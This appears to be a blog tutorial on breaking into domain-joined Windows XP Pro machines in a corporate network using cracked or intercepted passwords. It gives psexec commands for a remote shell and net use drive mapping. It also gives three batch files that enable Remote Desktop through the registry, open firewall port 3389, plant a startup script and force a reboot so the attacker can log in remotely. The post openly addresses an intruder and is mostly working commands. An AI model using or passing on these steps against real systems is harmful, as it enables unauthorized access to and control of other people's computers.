Accessing WinXP Pro computers in a corporate environment.
In most corporate environments all the XP boxes are on a domain, which means their credentials are just flying around all over. Let’s say you got some windows passwords and cracked them, from my last tutorial.
Or let’s say you got some cleartext passwords from some http stuff and you think that those passwords are the same as the windows passwords.
Typically on corporate machines RDP is enabled but if it isn’t then you can use psexec to get your head in the door.
http://www.microsoft.com/technet/sysinternals/security/psexec.mspx
Open the cmd prompt by hitting start run, then typing cmd then hitting enter.
Type this into the cmd prompt(make sure you are in the directory that psexec is in when you do this or add psexec to the system path):
psexec \\machinename –u username cmd
It will prompt you for a password which you have conveniently commandeered. Oh and username should be the username not the word. This will start a command prompt on your machine that is actually operating from the other machine. So you have \\machinename ‘s cmd prompt open. You can do any of your normal command prompt stuff from here. PSEXEC has an option for uploading a file when you use it but it is a little tricky. What I do is use the net command to map a drive to your computer from the other computer. Like so:
Net use r: \\breadstick\public /persistant:no
Will map the drive to the computer breadstick’s shared folder named public. So now you can just type.(Remember this is in the other comps cmd not your own)
R:
to access it.
So you can run a silent install of vnc for some sweet gui action or if you know no one is actually in front of the computer you can create these three bat files. And run first.bat.
Make three .bat files in the same directory on a thumb drive:
first.bat
code:
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0
mkdir c:\batter
copy second.bat c:\batter
copy third.bat c:\batter
cd %USERPROFILE%\Start Menu\programs\Startup\start.bat
copy c:\batter\second.bat start.bat
shutdown -r -t 0
second.bat
code:
netsh firewall set portopening tcp 3389 "RemoteDesktop"
cd c:\batter
third.bat
third.bat
code:
cd %USERPROFILE%\Start Menu\programs\Startup\
del start.bat
This will enable remote desktop on that machine so that you may remote into it.
No comments:
Post a Comment